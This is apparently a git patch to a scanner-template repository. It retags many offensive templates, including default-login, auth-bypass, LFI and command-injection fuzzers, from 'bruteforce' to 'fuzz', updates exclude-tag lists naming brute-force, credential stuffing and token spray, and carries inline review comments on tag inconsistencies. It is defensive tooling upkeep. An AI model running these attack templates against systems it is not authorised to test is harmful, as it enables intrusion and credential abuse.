http/misconfiguration/proxy/open-proxy-portscan.yaml | 2 +- http/technologies/graylog/graylog-api-exposure.yaml | 2 +- http/vulnerabilities/tongda/tongda-auth-bypass.yaml | 2 +- http/vulnerabilities/wordpress/wp-xmlrpc-brute-force.yaml | 2 +- javascript/cves/2023/CVE-2023-34039.yaml | 3 ++- javascript/default-logins/ssh-default-logins.yaml | 2 +- network/misconfig/mysql-native-password.yaml | 2 +- 
network/misconfig/tidb-native-password.yaml | 2 +- 40 files changed, 41 insertions(+), 41 deletions(-) diff --git a/.nuclei-ignore b/.nuclei-ignore index 4714e3b0df..40720ba50a 100644 --- a/.nuclei-ignore +++ b/.nuclei-ignore @@ -16,7 +16,6 @@ tags: - "fuzz" - "dos" - "local" - - "brute-force" - "bruteforce" - "phishing" diff --git a/cloud/enum/azure-vm-cloud-enum.yaml b/cloud/enum/azure-vm-cloud-enum.yaml index c9eb876265..62be7fe992 100644 --- a/cloud/enum/azure-vm-cloud-enum.yaml +++ b/cloud/enum/azure-vm-cloud-enum.yaml @@ -9,7 +9,7 @@ info: metadata: verified: true max-request: 1 - tags: cloud,cloud-enum,azure,bruteforce,enum + tags: cloud,cloud-enum,azure,fuzz,enum self-contained: true diff --git a/config/bugbounty.yml b/config/bugbounty.yml index b75b98dc83..0b04440ca1 100644 --- a/config/bugbounty.yml +++ b/config/bugbounty.yml @@ -20,7 +20,7 @@ type: exclude-tags: - tech - dos - - brute-force + - fuzz - creds-stuffing - token-spray - osint \ No newline at end of file diff --git a/config/pentest.yml b/config/pentest.yml index dc2466e291..2546416b85 100644 --- a/config/pentest.yml +++ b/config/pentest.yml @@ -15,5 +15,5 @@ type: exclude-tags: - dos - - brute-force + - fuzz - osint \ No newline at end of file diff --git a/config/recommended.yml b/config/recommended.yml index c3b24db1a9..fd09c67f0a 100644 --- a/config/recommended.yml +++ b/config/recommended.yml @@ -20,7 +20,7 @@ type: exclude-tags: - tech - dos - - brute-force + - fuzz - creds-stuffing - token-spray - osint diff --git a/http/cves/2017/CVE-2017-17562.yaml b/http/cves/2017/CVE-2017-17562.yaml index fd29113e97..a19b300778 100644 --- a/http/cves/2017/CVE-2017-17562.yaml +++ b/http/cves/2017/CVE-2017-17562.yaml @@ -28,7 +28,7 @@ info: max-request: 65 vendor: embedthis product: goahead - tags: cve,cve2017,rce,goahead,bruteforce,kev,vulhub,embedthis + tags: cve,cve2017,rce,goahead,fuzz,kev,vulhub,embedthis http: - raw: 
diff --git a/http/cves/2019/CVE-2019-17382.yaml b/http/cves/2019/CVE-2019-17382.yaml index e7cd0c42d7..babc75564f 100644 --- a/http/cves/2019/CVE-2019-17382.yaml +++ b/http/cves/2019/CVE-2019-17382.yaml @@ -27,7 +27,7 @@ info: max-request: 100 vendor: zabbix product: zabbix - tags: cve2019,cve,bruteforce,auth-bypass,login,edb,zabbix + tags: cve2019,cve,fuzz,auth-bypass,login,edb,zabbix http: - raw: diff --git a/http/cves/2022/CVE-2022-2034.yaml b/http/cves/2022/CVE-2022-2034.yaml index f5297ad76b..81846921c0 100644 --- a/http/cves/2022/CVE-2022-2034.yaml +++ b/http/cves/2022/CVE-2022-2034.yaml @@ -28,7 +28,7 @@ info: vendor: automattic product: sensei_lms framework: wordpress - tags: cve,cve2022,wp,disclosure,wpscan,sensei-lms,bruteforce,hackerone,wordpress,wp-plugin,automattic + tags: cve,cve2022,wp,disclosure,wpscan,sensei-lms,fuzz,hackerone,wordpress,wp-plugin,automattic http: - method: GET diff --git a/http/cves/2022/CVE-2022-2599.yaml b/http/cves/2022/CVE-2022-2599.yaml index ce4dd18699..71cb695804 100644 --- a/http/cves/2022/CVE-2022-2599.yaml +++ b/http/cves/2022/CVE-2022-2599.yaml @@ -29,7 +29,7 @@ info: vendor: anti-malware_security_and_brute-force_firewall_project product: anti-malware_security_and_brute-force_firewall framework: wordpress - tags: cve,cve2022,wordpress,wp-plugin,xss,gotmls,authenticated,wpscan,anti-malware_security_and_brute-force_firewall_project + tags: cve,cve2022,wordpress,wp-plugin,xss,gotmls,authenticated,wpscan http: - raw: diff --git a/http/cves/2023/CVE-2023-24489.yaml b/http/cves/2023/CVE-2023-24489.yaml index b2d05cd0a9..84207995d6 100644 --- a/http/cves/2023/CVE-2023-24489.yaml +++ b/http/cves/2023/CVE-2023-24489.yaml 
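Review bot: The CVE-2022-2599 hunk removes the trailing `anti-malware_security_and_brute-force_firewall_project` tag instead of swapping a `bruteforce` tag, so the template loses its vendor tag while the other CVE hunks in this commit keep theirs (`embedthis`, `zabbix`, `automattic`, `citrix` remain as the final tag). The `vendor:` line above it still carries that value, so presumably the tag was dropped only because it contains the substring `brute-force`; if vendor tags are meant to stay searchable, keep it — `tags: cve,cve2022,wordpress,wp-plugin,xss,gotmls,authenticated,wpscan,anti-malware_security_and_brute-force_firewall_project` — and have whatever check rejects it compare whole tags rather than substrings.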
@@ -28,7 +28,7 @@ info: vendor: citrix product: sharefile_storage_zones_controller shodan-query: title:"ShareFile Storage Server"
- tags: cve2023,cve,sharefile,rce,intrusive,fileupload,bruteforce,kev,citrix
+ tags: cve2023,cve,sharefile,rce,intrusive,fileupload,fuzz,kev,citrix
variables: fileName: '{{rand_base(8)}}'
diff --git a/http/default-logins/oracle/peoplesoft-default-login.yaml b/http/default-logins/oracle/peoplesoft-default-login.yaml
index ab570a5d23..5efacaf70e 100644
--- a/http/default-logins/oracle/peoplesoft-default-login.yaml
+++ b/http/default-logins/oracle/peoplesoft-default-login.yaml
@@ -16,7 +16,7 @@ info: verified: true max-request: 200 shodan-query: title:"Oracle PeopleSoft Sign-in"
- tags: default-login,peoplesoft,oracle,bruteforce
+ tags: default-login,peoplesoft,oracle,fuzz
http: - method: POST
diff --git a/http/exposed-panels/adminer-panel-detect.yaml b/http/exposed-panels/adminer-panel-detect.yaml
index 1b29926f7b..8f3282ffe1 100644
--- a/http/exposed-panels/adminer-panel-detect.yaml
+++ b/http/exposed-panels/adminer-panel-detect.yaml
@@ -19,7 +19,7 @@ info: vendor: adminer product: adminer max-request: 741
- tags: panel,bruteforce,adminer,login,sqli
+ tags: panel,fuzz,adminer,login,sqli
http: - raw:
diff --git a/http/exposures/backups/php-backup-files.yaml b/http/exposures/backups/php-backup-files.yaml
index 6243db5b26..a6fba70644 100644
--- a/http/exposures/backups/php-backup-files.yaml
+++ b/http/exposures/backups/php-backup-files.yaml
@@ -7,7 +7,7 @@ info: description: PHP Source File is disclosed to external users. metadata: max-request: 1512
- tags: exposure,backup,php,disclosure,bruteforce
+ tags: exposure,backup,php,disclosure,fuzz
http: - method: GET
diff --git a/http/fuzzing/cache-poisoning-fuzz.yaml b/http/fuzzing/cache-poisoning-fuzz.yaml
index f76d291382..9e0174b891 100644
--- a/http/fuzzing/cache-poisoning-fuzz.yaml
+++ b/http/fuzzing/cache-poisoning-fuzz.yaml
@@ -9,7 +9,7 @@ info: - https://portswigger.net/web-security/web-cache-poisoning metadata: max-request: 5834
- tags: fuzzing,bruteforce,cache
+ tags: fuzz,cache
http: - raw:
diff --git a/http/fuzzing/header-command-injection.yaml b/http/fuzzing/header-command-injection.yaml
index 550e7fbc9a..9863e8e4b0 100644
--- a/http/fuzzing/header-command-injection.yaml
+++ b/http/fuzzing/header-command-injection.yaml
@@ -11,7 +11,7 @@ info: cwe-id: CWE-77 metadata: max-request: 7650
- tags: fuzzing,bruteforce,rce
+ tags: fuzz,rce
http: - raw:
diff --git a/http/fuzzing/iis-shortname.yaml b/http/fuzzing/iis-shortname.yaml
index 6be72001b3..d6da7ac5b6 100644
--- a/http/fuzzing/iis-shortname.yaml
+++ b/http/fuzzing/iis-shortname.yaml
@@ -15,7 +15,7 @@ info: cwe-id: CWE-200 metadata: max-request: 4
- tags: bruteforce,edb
+ tags: iis,edb
http: - raw:
diff --git a/http/fuzzing/linux-lfi-fuzzing.yaml b/http/fuzzing/linux-lfi-fuzzing.yaml
index f313bfc151..d21b76eb01 100644
--- a/http/fuzzing/linux-lfi-fuzzing.yaml
+++ b/http/fuzzing/linux-lfi-fuzzing.yaml
@@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 22
- tags: fuzzing,linux,lfi,bruteforce
+ tags: linux,lfi,fuzzing
http: - method: GET
diff --git a/http/fuzzing/mdb-database-file.yaml b/http/fuzzing/mdb-database-file.yaml
index 7c633cd03e..3239da2aee 100644
--- a/http/fuzzing/mdb-database-file.yaml
+++ b/http/fuzzing/mdb-database-file.yaml
@@ -13,7 +13,7 @@ info: cwe-id: CWE-200 metadata: max-request: 341
- tags: bruteforce,mdb,asp
+ tags: fuzz,mdb,asp
http: - raw:
diff --git a/http/fuzzing/prestashop-module-fuzz.yaml b/http/fuzzing/prestashop-module-fuzz.yaml
index d280c39b77..812dc64365 100644
--- a/http/fuzzing/prestashop-module-fuzz.yaml
+++ b/http/fuzzing/prestashop-module-fuzz.yaml
@@ -6,7 +6,7 @@ info: severity: info metadata: max-request: 639
- tags: fuzzing,bruteforce,prestashop
+ tags: fuzz,prestashop
http: - raw:
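Review bot: linux-lfi-fuzzing.yaml is retagged `linux,lfi,fuzzing` while every other template in this commit, including cache-poisoning-fuzz.yaml, header-command-injection.yaml and prestashop-module-fuzz.yaml in the same line, replaces `fuzzing`/`bruteforce` with `fuzz`; valid-gmail-check.yaml (`tags: fuzzing,gmail`) and xff-403-bypass.yaml (`tags: fuzzing`) further down have the same problem. The `.nuclei-ignore` list and the `config/*.yml` exclude-tags lists changed in this commit filter on `fuzz`, not `fuzzing`, so these three templates, which were skipped by default while they carried `bruteforce`, now run by default — a behaviour change the rename does not seem to intend. Use `tags: linux,lfi,fuzz`, `tags: fuzz,gmail` and `tags: fuzz` respectively, or add `fuzzing` to the same lists.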
diff --git a/http/fuzzing/ssrf-via-proxy.yaml b/http/fuzzing/ssrf-via-proxy.yaml
index 013f9b777d..5959166489 100644
--- a/http/fuzzing/ssrf-via-proxy.yaml
+++ b/http/fuzzing/ssrf-via-proxy.yaml
@@ -10,7 +10,7 @@ info: - https://twitter.com/ImoJOnDz/status/1649089777629827072 metadata: max-request: 9
- tags: ssrf,proxy,oast,bruteforce
+ tags: ssrf,proxy,oast,fuzz
http: - payloads:
diff --git a/http/fuzzing/valid-gmail-check.yaml b/http/fuzzing/valid-gmail-check.yaml
index 6d3a9fd0d6..11f2a8e76b 100644
--- a/http/fuzzing/valid-gmail-check.yaml
+++ b/http/fuzzing/valid-gmail-check.yaml
@@ -8,7 +8,7 @@ info: - https://github.com/dievus/geeMailUserFinder metadata: max-request: 1
- tags: bruteforce,gmail
+ tags: fuzzing,gmail
self-contained: true
diff --git a/http/fuzzing/waf-fuzz.yaml b/http/fuzzing/waf-fuzz.yaml
index 392aa4cad0..a525a24f89 100644
--- a/http/fuzzing/waf-fuzz.yaml
+++ b/http/fuzzing/waf-fuzz.yaml
@@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 58
- tags: fuzzing,waf,tech,bruteforce
+ tags: waf,tech,fuzz
http: - raw:
diff --git a/http/fuzzing/wordpress-plugins-detect.yaml b/http/fuzzing/wordpress-plugins-detect.yaml
index ac4f0ded77..1b3d0851f9 100644
--- a/http/fuzzing/wordpress-plugins-detect.yaml
+++ b/http/fuzzing/wordpress-plugins-detect.yaml
@@ -5,8 +5,8 @@ info: author: 0xcrypto severity: info metadata:
- max-request: 100563
- tags: fuzzing,bruteforce,wordpress
+ max-request: 98135
+ tags: fuzz,wordpress
http: - raw:
diff --git a/http/fuzzing/wordpress-themes-detect.yaml b/http/fuzzing/wordpress-themes-detect.yaml
index 3bb2f31ff5..c5df4957c4 100644
--- a/http/fuzzing/wordpress-themes-detect.yaml
+++ b/http/fuzzing/wordpress-themes-detect.yaml
@@ -6,7 +6,7 @@ info: severity: info metadata: max-request: 24434
- tags: bruteforce,wordpress,wp
+ tags: fuzz,wordpress
http: - raw:
diff --git a/http/fuzzing/wordpress-weak-credentials.yaml b/http/fuzzing/wordpress-weak-credentials.yaml
index 55bff6004d..f2f4adfe9d 100644
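Review bot: wordpress-plugins-detect.yaml changes `max-request` from 100563 to 98135 in a commit that otherwise only renames tags, and nothing else in this file is touched (the diffstat charges it two changed lines, both in this hunk). `max-request` is meant to mirror the number of requests the template issues, so either the old value was stale or the count comes from a payload list changed outside this commit; a reader cannot tell which from the diff. Say so in the commit message, or add a comment on the new line such as `max-request: 98135  # recomputed from the plugin payload list`, so the number is not mistaken for a typo. In the wordpress-themes-detect.yaml hunk below, the `wp` tag is dropped alongside `bruteforce` while CVE-2022-2034.yaml keeps `wp`; if that is intentional, a word in the commit message would help.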
--- a/http/fuzzing/wordpress-weak-credentials.yaml
+++ b/http/fuzzing/wordpress-weak-credentials.yaml
@@ -14,7 +14,7 @@ info: cwe-id: CWE-1391 metadata: max-request: 276
- tags: wordpress,default-login,bruteforce
+ tags: wordpress,default-login,fuzz
http: - raw:
diff --git a/http/fuzzing/xff-403-bypass.yaml b/http/fuzzing/xff-403-bypass.yaml
index 564e32ff7e..868adda120 100644
--- a/http/fuzzing/xff-403-bypass.yaml
+++ b/http/fuzzing/xff-403-bypass.yaml
@@ -7,7 +7,7 @@ info: description: Template to detect 403 forbidden endpoint bypass behind Nginx/Apache proxy & load balancers, based on X-Forwarded-For header. metadata: max-request: 3
- tags: fuzzing,bruteforce
+ tags: fuzzing
http: - raw:
diff --git a/http/miscellaneous/defacement-detect.yaml b/http/miscellaneous/defacement-detect.yaml
index 3e6a8b0352..e3151f3d8f 100644
--- a/http/miscellaneous/defacement-detect.yaml
+++ b/http/miscellaneous/defacement-detect.yaml
@@ -16,7 +16,7 @@ info: metadata: verified: true max-request: 85
- tags: misc,defacement,spam,hacktivism,bruteforce
+ tags: misc,defacement,spam,hacktivism,fuzz
http: - method: GET
diff --git a/http/miscellaneous/ntlm-directories.yaml b/http/miscellaneous/ntlm-directories.yaml
index 33d464a191..babfb2e205 100644
--- a/http/miscellaneous/ntlm-directories.yaml
+++ b/http/miscellaneous/ntlm-directories.yaml
@@ -8,7 +8,7 @@ info: - https://medium.com/swlh/internal-information-disclosure-using-hidden-ntlm-authentication-18de17675666 metadata: max-request: 47
- tags: miscellaneous,misc,bruteforce,windows
+ tags: miscellaneous,misc,fuzz,windows
http: - raw:
diff --git a/http/misconfiguration/aem/aem-userinfo-servlet.yaml b/http/misconfiguration/aem/aem-userinfo-servlet.yaml
index a9f4c34b1f..8fb9cd75de 100644
--- a/http/misconfiguration/aem/aem-userinfo-servlet.yaml
+++ b/http/misconfiguration/aem/aem-userinfo-servlet.yaml
@@ -8,7 +8,7 @@ info: metadata: max-request: 1 shodan-query: http.component:"Adobe Experience Manager"
- tags: aem,bruteforce,misconfig
+ tags: aem,misconfig
http: - method: GET
diff --git a/http/misconfiguration/gitlab/gitlab-user-enum.yaml b/http/misconfiguration/gitlab/gitlab-user-enum.yaml
index d4a246907a..32032a9d63 100644
--- a/http/misconfiguration/gitlab/gitlab-user-enum.yaml
+++ b/http/misconfiguration/gitlab/gitlab-user-enum.yaml
@@ -9,7 +9,7 @@ info: metadata: max-request: 100 shodan-query: http.title:"GitLab"
- tags: gitlab,enum,misconfig,bruteforce
+ tags: gitlab,enum,misconfig,fuzz
http: - raw:
diff --git a/http/misconfiguration/proxy/open-proxy-internal.yaml b/http/misconfiguration/proxy/open-proxy-internal.yaml
index 4f55147edc..2c2ffb316d 100644
--- a/http/misconfiguration/proxy/open-proxy-internal.yaml
+++ b/http/misconfiguration/proxy/open-proxy-internal.yaml
@@ -16,7 +16,7 @@ info: cwe-id: CWE-441 metadata: max-request: 25
- tags: exposure,config,proxy,misconfig,bruteforce
+ tags: exposure,config,proxy,misconfig,fuzz
http: - raw:
diff --git a/http/misconfiguration/proxy/open-proxy-localhost.yaml b/http/misconfiguration/proxy/open-proxy-localhost.yaml
index 4bbd6ea3f8..05e927aeb7 100644
--- a/http/misconfiguration/proxy/open-proxy-localhost.yaml
+++ b/http/misconfiguration/proxy/open-proxy-localhost.yaml
@@ -16,7 +16,7 @@ info: cwe-id: CWE-441 metadata: max-request: 6
- tags: exposure,config,proxy,misconfig,bruteforce
+ tags: exposure,config,proxy,misconfig,fuzz
http: - raw:
diff --git a/http/misconfiguration/proxy/open-proxy-portscan.yaml b/http/misconfiguration/proxy/open-proxy-portscan.yaml
index f9e8c625c5..e59ad881a8 100644
--- a/http/misconfiguration/proxy/open-proxy-portscan.yaml
+++ b/http/misconfiguration/proxy/open-proxy-portscan.yaml
@@ -16,7 +16,7 @@ info: cwe-id: CWE-441 metadata: max-request: 8
- tags: exposure,config,proxy,misconfig,bruteforce
+ tags: exposure,config,proxy,misconfig,fuzz
http: - raw:
diff --git a/http/technologies/graylog/graylog-api-exposure.yaml b/http/technologies/graylog/graylog-api-exposure.yaml
index ef9301e3a1..1ff34721ff 100644
--- a/http/technologies/graylog/graylog-api-exposure.yaml
+++ b/http/technologies/graylog/graylog-api-exposure.yaml
@@ -13,7 +13,7 @@ info: verified: true max-request: 50 shodan-query: Graylog
- tags: tech,graylog,api,swagger,bruteforce
+ tags: tech,graylog,api,swagger,fuzz
http: - method: GET
diff --git a/http/vulnerabilities/tongda/tongda-auth-bypass.yaml b/http/vulnerabilities/tongda/tongda-auth-bypass.yaml
index 2366e35ff2..e161a36a79 100644
--- a/http/vulnerabilities/tongda/tongda-auth-bypass.yaml
+++ b/http/vulnerabilities/tongda/tongda-auth-bypass.yaml
@@ -14,7 +14,7 @@ info: shodan-query: title:"通达OA" fofa-query: title="通达OA" zoomeye-query: app:"通达OA"
- tags: tongda,auth-bypass,bruteforce
+ tags: tongda,auth-bypass,fuzz
http: - raw:
diff --git a/http/vulnerabilities/wordpress/wp-xmlrpc-brute-force.yaml b/http/vulnerabilities/wordpress/wp-xmlrpc-brute-force.yaml
index 4f2ba6473d..8aaa5f0c80 100644
--- a/http/vulnerabilities/wordpress/wp-xmlrpc-brute-force.yaml
+++ b/http/vulnerabilities/wordpress/wp-xmlrpc-brute-force.yaml
@@ -10,7 +10,7 @@ info: - https://www.acunetix.com/vulnerabilities/web/wordpress-xml-rpc-authentication-brute-force/ metadata: max-request: 276
- tags: wordpress,php,xmlrpc,bruteforce
+ tags: wordpress,php,xmlrpc,fuzz
http: - raw:
diff --git a/javascript/cves/2023/CVE-2023-34039.yaml b/javascript/cves/2023/CVE-2023-34039.yaml
index f71d6ad270..cd606aeb7f 100644
--- a/javascript/cves/2023/CVE-2023-34039.yaml
+++ b/javascript/cves/2023/CVE-2023-34039.yaml
@@ -29,7 +29,8 @@ info: verified: true vendor: vmware product: aria_operations_for_networks
- tags: js,packetstorm,cve,cve2019,vmware,aria,rce,bruteforce,vrealize
+ tags: js,packetstorm,cve,cve2019,vmware,aria,rce,fuzz,vrealize
+
variables: keysDir: "helpers/payloads/cve-2023-34039-keys" # load all private keys from this directory
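Review bot: The rewritten tags line for javascript/cves/2023/CVE-2023-34039.yaml still carries `cve2019`, although the file path, the `keysDir` value two lines below and the year tags used by the other CVE templates in this commit (`cve2017`, `cve2019`, `cve2022`, `cve2023`, each matching its file) all point to `cve2023`. Since the line is being rewritten anyway, fix it in the same change: `tags: js,packetstorm,cve,cve2023,vmware,aria,rce,fuzz,vrealize`. Anyone filtering a scan with `-tags cve2023` currently misses this template.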
diff --git a/javascript/default-logins/ssh-default-logins.yaml b/javascript/default-logins/ssh-default-logins.yaml
index c048e1bbf5..d3dcf075dd 100644
--- a/javascript/default-logins/ssh-default-logins.yaml
+++ b/javascript/default-logins/ssh-default-logins.yaml
@@ -7,7 +7,7 @@ info: metadata: max-request: 223 shodan-query: port:1433
- tags: js,ssh,default-login,network,bruteforce
+ tags: js,ssh,default-login,network,fuzz
javascript: - pre-condition: |
diff --git a/network/misconfig/mysql-native-password.yaml b/network/misconfig/mysql-native-password.yaml
index 0c2b16762b..2ade9b58cc 100644
--- a/network/misconfig/mysql-native-password.yaml
+++ b/network/misconfig/mysql-native-password.yaml
@@ -12,7 +12,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1
- tags: network,mysql,bruteforce,db,misconfig
+ tags: network,mysql,db,misconfig
tcp: - host:
diff --git a/network/misconfig/tidb-native-password.yaml b/network/misconfig/tidb-native-password.yaml
index 94c0f0b903..684baa5174 100644
--- a/network/misconfig/tidb-native-password.yaml
+++ b/network/misconfig/tidb-native-password.yaml
@@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1
- tags: network,tidb,bruteforce,db,misconfig
+ tags: network,tidb,db,misconfig
tcp: - host:
From c7359837ab2e45f819c57d8aba0a46fc68960595 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 19 Mar 2024 16:39:00 +0000 Subject: [PATCH 15/86] Auto Generated Templates Checksum [Tue Mar 19 16:39:00 UTC 2024] :robot:
--- templates-checksum.txt | 82 +++++++++++++++++++++--------------- 1 file changed, 41 insertions(+), 41 deletions(-)
diff --git a/templates-checksum.txt b/templates-checksum.txt
index 916ac8838a..7516f9bdb0 100644
--- a/templates-checksum.txt
+++ b/templates-checksum.txt
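Review bot: Not introduced by this commit, but the context line `shodan-query: port:1433` directly above the retagged line in ssh-default-logins.yaml is the MSSQL port, which is odd for a template named and tagged `ssh`; it may have been carried over from mssql-default-logins.yaml, which sits in the same directory. Since the metadata block is being edited anyway, `shodan-query: port:22` would fit, assuming the template really probes SSH on its default port — the request section is outside this hunk, so please confirm before changing it.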
@@ -10,7 +10,7 @@ TOP-10.md:06a54531fef2bfc5ec2fa38485a3e30c247a3132 cloud/enum/aws-app-enum.yaml:26d0dcf57c7ba8003940ed1d53a62971564b2018 cloud/enum/aws-s3-bucket-enum.yaml:0d101b898bbaebceea4020963d11829f8167029f cloud/enum/azure-db-enum.yaml:3d29a3c86288356d862922ef0527de99187bf734 -cloud/enum/azure-vm-cloud-enum.yaml:d40729aac7a1bfc55ceaf617c16a08c78fe9600f +cloud/enum/azure-vm-cloud-enum.yaml:69ca5c626f0061e4c9bcc922bf9e05f078459bd2 cloud/enum/azure-website-enum.yaml:037397591c799d32eb8abc94a346ff0805d68204 cloud/enum/gcp-app-engine-enum.yaml:b22ff0601a3f7f6ddc39e39ab9dc34410d213e41 cloud/enum/gcp-bucket-enum.yaml:896300c26517adf67feb80304f5edb25590a03c4 @@ -97,13 +97,13 @@ code/privilege-escalation/linux/rw-sudoers.yaml:f974b1d1a68fd7a8cd24b6f1b61855dd code/privilege-escalation/linux/sudo-nopasswd.yaml:3117c141f35b9229b6ebe1db10a4fef77aa6ee17 code/privilege-escalation/linux/writable-etc-passwd.yaml:c0ad4796f42aab9c901b52b52b91940172d070e9 config/README.md:48976bdcd95e99dbc8d6d2a9004df27e0bfa8494 -config/bugbounty.yml:d45915281bcb027c5aac65ec0f66fda4c914bd12 +config/bugbounty.yml:05aaced1241dba5b3c3b37559269b1cae473f52f config/cloud.yml:454e596d8ca3f19213b148f6c54c20806cb87a8e config/compliance.yml:367b57e7e900f92bc8d9e5883e635e975da0cae9 config/osint.yml:683fe1e52716d054760d707dbc123f5e09de5418 -config/pentest.yml:c7b04a39e2efaf1a5f627da9b49ecf714d927f0e +config/pentest.yml:e3a9ebe543e9c2d046ead1efc292394b54a55196 config/privilege-escalation.yml:325607b721fcea55111f8698b10951fd2f0d17b8 -config/recommended.yml:eb4d0cb29634218f0279692e8c59fa1906d7148c +config/recommended.yml:adcd4e1f0ef7b6b8c57fddbdda3ebf2314a8fa9b contributors.json:951e2ab8bbae42da01f52da9ef0a14ce7f17e159 cves.json:51d8ac58d8ffdf6cfd4660d3e19373bb08bb6605 cves.json-checksum.txt:fdca644f563bcfe217c57881fc5991db50a942e4 
@@ -1199,7 +1199,7 @@ http/cves/2017/CVE-2017-16894.yaml:0c7f7d0bdb16cdff6e7a380ba56208eb1ca9d6e6 http/cves/2017/CVE-2017-17043.yaml:b45105c0de0d90d61a79191de73976e9cd4fb790 http/cves/2017/CVE-2017-17059.yaml:d40f8c2b908798457c9b02fa98a480b8bc0a7215 http/cves/2017/CVE-2017-17451.yaml:04b0b3fec8b256c76cef8ea892836c2e420878b8 -http/cves/2017/CVE-2017-17562.yaml:d3e0e64e607cfaaace054ae2b40fd4b792f19b92 +http/cves/2017/CVE-2017-17562.yaml:f73fd69cc36d28c4be6a6747c45f942f857029ef http/cves/2017/CVE-2017-17731.yaml:1666574cd4dfc7a3995867c7c4b621b267b885ff http/cves/2017/CVE-2017-17736.yaml:877434782e6a2c5b3095498877a022c3551b6ca8 http/cves/2017/CVE-2017-18024.yaml:6b154b9615599e11764e703081eca6329935ee5e @@ -1496,7 +1496,7 @@ http/cves/2019/CVE-2019-16932.yaml:182fef4932dc7931c45cd3d7aebdaeef9ded81e8 http/cves/2019/CVE-2019-16996.yaml:ad524a9c60b54d610e8c55acaa46e4958a9b8dce http/cves/2019/CVE-2019-16997.yaml:e103b4c103866170ecfaef2fcf0e2cf88609b940 http/cves/2019/CVE-2019-17270.yaml:8f282f5849f13dda11bbb8837079bb223d9687fb -http/cves/2019/CVE-2019-17382.yaml:8b758f47cbcdde1a0409b679b261ccf5fcbd7d50 +http/cves/2019/CVE-2019-17382.yaml:2a14f06044507c830b2d10f4a86315439d64f88f http/cves/2019/CVE-2019-17418.yaml:dbeea758a5b8de4c18d2d8790798711113d69195 http/cves/2019/CVE-2019-17444.yaml:7b94376c34d962236141cba63543376257005654 http/cves/2019/CVE-2019-17503.yaml:6701aacab1ee79d24acd3cbd1497fb50399ad671 
@@ -2398,7 +2398,7 @@ http/cves/2022/CVE-2022-1933.yaml:97c269db3367ffd56494243b090e307b4eb0b586 http/cves/2022/CVE-2022-1937.yaml:f888a42c920fb30ae5b563bf642af334cd97da95 http/cves/2022/CVE-2022-1946.yaml:982f4f9519b1a137a8d2f2c71c7f2225cb67da1d http/cves/2022/CVE-2022-1952.yaml:4c4d64ceb64295942d0d9c2c1ae79a9bc6a16ee7 -http/cves/2022/CVE-2022-2034.yaml:a56290dfd329c3ac92bf63ca31f9a8ccfafd7386 +http/cves/2022/CVE-2022-2034.yaml:db07244959fe5aec265a0b9f1e8b398a93a6076c http/cves/2022/CVE-2022-21371.yaml:e9b20049b90afecb519db58387e5922047ef5944 http/cves/2022/CVE-2022-21500.yaml:7a87435ea2a54ac9c454a344a87fd21e51758b36 http/cves/2022/CVE-2022-21587.yaml:9e40fc00a04665d81ac142e197d40f1926a521c6 @@ -2480,7 +2480,7 @@ http/cves/2022/CVE-2022-25489.yaml:5c5c7a7388f9e133b0cf380bad27eeaebb0c2a74 http/cves/2022/CVE-2022-25497.yaml:07424dc06af0ea2d10c5aa1a201ce4d0f2d26848 http/cves/2022/CVE-2022-2551.yaml:a2dc5d4686710a2e9aeea1bdadf8f7fac2f3766f http/cves/2022/CVE-2022-25568.yaml:aabffcf5827e7ee05211b2651ca350e913371665 -http/cves/2022/CVE-2022-2599.yaml:3acebe0eef8eedb44906ac2579e6d0f0024a48d3 +http/cves/2022/CVE-2022-2599.yaml:51779e43ad99b49a367ddd03a76fc22508c0c15c http/cves/2022/CVE-2022-26134.yaml:788a7f51e1550cc5770aab979234ac35b54d2505 http/cves/2022/CVE-2022-26138.yaml:15d0534ab6765d2e536070eda15d020e04f43abc http/cves/2022/CVE-2022-26148.yaml:f37f9182974b9dd8d49af32a7ef9841fe7d704ae 
@@ -2819,7 +2819,7 @@ http/cves/2023/CVE-2023-24278.yaml:e397c7d647c7517b78e44dbc79c8fcbc80480623 http/cves/2023/CVE-2023-24322.yaml:c4b5cc0d4d70fa16682f706a954b95c84e0e7896 http/cves/2023/CVE-2023-24367.yaml:dab63258fffca6b44d754ede551d56eea925a477 http/cves/2023/CVE-2023-24488.yaml:8a381e70fd0643ed5d1371edb70b40e25e9b5ff8 -http/cves/2023/CVE-2023-24489.yaml:c8aa249866735b4ad90a721d721d9e9426628ad8 +http/cves/2023/CVE-2023-24489.yaml:ffcbd0678ae55a267244d0a62703c1756b701aae http/cves/2023/CVE-2023-24657.yaml:1efdbfecef2aacf600fb007989d4efc6aa9d7fbe http/cves/2023/CVE-2023-24733.yaml:f1b740ac9ba1fc859deb3c69798e1bc3d302ed4e http/cves/2023/CVE-2023-24735.yaml:e38322978b1598d32056adb11572c6c401107c40 @@ -3055,7 +3055,7 @@ http/cves/2023/CVE-2023-5244.yaml:32f7df605dda4c16610c548f773673f5b69c67a5 http/cves/2023/CVE-2023-5360.yaml:387bf52196ed2e1d383a97ea158fe90b94d213b9 http/cves/2023/CVE-2023-5375.yaml:394c4b2b0867a8922fcfad500616380c117983d8 http/cves/2023/CVE-2023-5556.yaml:7d50d6e2861161f90b7876147d3405d5c7eeccf4 -http/cves/2023/CVE-2023-5830.yaml:85965a9925a1cd03639181416b2c20995b33f501 +http/cves/2023/CVE-2023-5830.yaml:76c2cd53d3eb9187c00e98e057fa4cdd29412e6a http/cves/2023/CVE-2023-5914.yaml:93f627b753ac975d5a74a2532a42aa9449682207 http/cves/2023/CVE-2023-6018.yaml:e840e467eab7d472ae719996be481de06fafb2cf http/cves/2023/CVE-2023-6020.yaml:68c05fb386a060d81834e2ddbaefb5779ae81b51 
